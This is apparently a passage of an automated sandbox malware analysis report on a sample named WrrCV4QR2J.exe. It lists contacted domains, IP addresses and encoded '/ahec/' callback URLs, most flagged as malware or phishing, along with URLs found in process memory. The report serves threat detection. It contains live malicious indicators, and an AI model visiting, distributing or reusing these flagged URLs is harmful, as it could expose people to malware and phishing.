            https://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0%Avira URL Cloudsafe
            http://www.wrautomotive.online/ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            https://www.transip.eu/knowledgebase/zoeken/0%Avira URL Cloudsafe
            http://www.nesmalt.info/ahec/100%Avira URL Cloudmalware
            http://www.77moea.top/ahec/100%Avira URL Cloudphishing
            https://www.transip.eu/question/110000577/0%Avira URL Cloudsafe
            http://www.thecoloringbitch.com/ahec/100%Avira URL Cloudmalware
            http://www.makeinai.online/ahec/100%Avira URL Cloudmalware
            http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z100%Avira URL Cloudmalware
            https://transip.eu/cp/0%Avira URL Cloudsafe
            https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk0%Avira URL Cloudsafe
            http://www.makeinai.online/ahec/?XveXHZvx=MydpLo7WWyKQN3KVLs+v6WaBMDmZ37UnbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOkoUWHW96MRNJ3hQ==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            https://transip.eu/0%Avira URL Cloudsafe
            https://www.transip.eu/question/110000576/0%Avira URL Cloudsafe
            https://www.transip.eu/question/1000002300%Avira URL Cloudsafe
            http://www.wrautomotive.online/ahec/100%Avira URL Cloudmalware
            https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.makeinai.online
            		37.140.192.89
            		truetrue
              		unknown
              www.nesmalt.info
              		66.29.155.54
              		truetrue
                		unknown
                www.611erhm.top
                		34.117.26.57
                		truetrue
                  		unknown
                  fam-scharf.net
                  		81.169.145.70
                  		truetrue
                    		unknown
                    instantconvey.com
                    		131.153.147.90
                    		truetrue
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truetrue
                        		unknown
                        altralogos.com
                        		185.74.252.11
                        		truetrue
                          		unknown
                          alldaysslimmingstea.com
                          		162.222.226.77
                          		truetrue
                            		unknown
                            dns.ladipage.com
                            		52.220.48.161
                            		truetrue
                              		unknown
                              wrautomotive.online
                              		37.97.254.27
                              		truetrue
                                		unknown
                                www.user4deepriver.com
                                		74.208.236.181
                                		truetrue
                                  		unknown
                                  www.domainappraisalbot.com
                                  		94.23.162.163
                                  		truetrue
                                    		unknown
                                    thecoloringbitch.com
                                    		162.241.252.161
                                    		truetrue
                                      		unknown
                                      www.poria.link
                                      		104.21.18.253
                                      		truetrue
                                        		unknown
                                        www.77moea.top
                                        		107.178.250.177
                                        		truefalse
                                          		unknown
                                          www.magmadokum.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.altralogos.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wrautomotive.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.instantconvey.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.thecoloringbitch.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.alldaysslimmingstea.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.npstore.asia
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.fam-scharf.net
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.instantconvey.com/ahec/?XveXHZvx=SEtDmKR01RO/v1ckzNpTcUhCl/PMZGqFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7YIFIq1ILz0nKZVg==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.poria.link/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.magmadokum.com/ahec/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fam-scharf.net/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.nesmalt.info/ahec/?XveXHZvx=DTrGbTEHMG6Y4mK16jmiKUG3Xw8oKDF5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRrX+Dyau3GNz4OAA==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.77moea.top/ahec/?XveXHZvx=W415zxONlMY0LROHEGAnVDwgVvy34PrUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7al4cCYp0GZGyu2aw==&l4xX=rDStpH0Hefalse
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.fam-scharf.net/ahec/?XveXHZvx=pHT1kOem2IT0Y9TJ94VCHNnbNLZhsvH3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhQP0JKKbiUNKMEcA==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.domainappraisalbot.com/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.altralogos.com/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.611erhm.top/ahec/true
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.thecoloringbitch.com/ahec/?XveXHZvx=nB1qtJANgieev8TKH3dNfv3ofOkziUaCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMTKbCYScmVHGO9lg==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.domainappraisalbot.com/ahec/?XveXHZvx=bB5JTYLqXbmN0Rh52tJaPPP1nCuGRYxCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYc20p8FNjdU2pWhmA==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.user4deepriver.com/ahec/?XveXHZvx=9k2v98v8fW7x5mt2TD9N5hM0Gp49wMZ6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0pnZhULhTE/SFE2Bw==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.npstore.asia/ahec/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.wrautomotive.online/ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.nesmalt.info/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.77moea.top/ahec/false
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.makeinai.online/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.thecoloringbitch.com/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.makeinai.online/ahec/?XveXHZvx=MydpLo7WWyKQN3KVLs+v6WaBMDmZ37UnbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOkoUWHW96MRNJ3hQ==&l4xX=rDStpH0Hetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.wrautomotive.online/ahec/true
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabisoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://track.uc.cn/collectisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.transip.eu/services/search-domains/UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.transip.nl/vragen/110000534/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designersWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://transip.nl/UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sajatypeworks.comWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.dynadot.comisoburn.exe, 00000004.00000002.4122089347.00000000053AA000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002E3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cn/cTheWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://hm.baidu.com/hm.js?isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.galapagosdesign.com/DPleaseWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.transip.nl/vragen/198/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleaseWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.zhongyicts.com.cnWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://cdn.jsinit.directfwd.com/sk-jspark_init.phpisoburn.exe, 00000004.00000002.4122089347.0000000005086000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002B16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2011901492.00000000388F6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://mozilla.org0/isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.carterandcone.comlWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://trustpilot.com/review/www.transip.nlisoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.transip.nl/vragen/110000580/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.com/designers/frere-user.htmlWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://files.reg.ru/fonts/inter/Inter-Medium.woff)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.reg.ru/hostingUHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.transip.nl/vragen/110000572isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://parkcloud.dynadot.com/logo.gifisoburn.exe, 00000004.00000002.4122089347.00000000053AA000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002E3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://files.reg.ru/fonts/inter/Inter-Regular.woff2)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.transip.eu/terms-of-service/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.npstore.asiaUHPrrMeffyCaz.exe, 00000006.00000002.4122987112.0000000004ABE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://reg.ru?target=_blankisoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.com/designersGWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.fontbureau.com/designers/?WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.founder.com.cn/cn/bTheWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers?WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.transip.eu/knowledgebase/zoeken/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnLisoburn.exe, 00000004.00000002.4122089347.0000000006682000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000004112000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.tiro.comWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.transip.nl/services/search-domains/UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.goodfont.co.krWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.typography.netDWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htmWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://files.reg.ru/fonts/inter/Inter-Regular.woff)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://nl.trustpilot.com/review/www.transip.nlisoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.transip.eu/question/110000577/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://transip.nl/cp/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.transip.nl/algemene-voorwaarden/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.fonts.comWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.sandoll.co.krWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://www.transip.nl/privacy-policy/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Zisoburn.exe, 00000004.00000002.4122089347.00000000061CC000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003C5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          http://www.sakkal.comWrrCV4QR2J.exe, 00000000.00000002.1686390703.0000000005980000.00000004.00000020.00020000.00000000.sdmp, WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.fontbureau.comWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://crash-reports.mozilla.com/submit?id=isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://transip.eu/cp/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
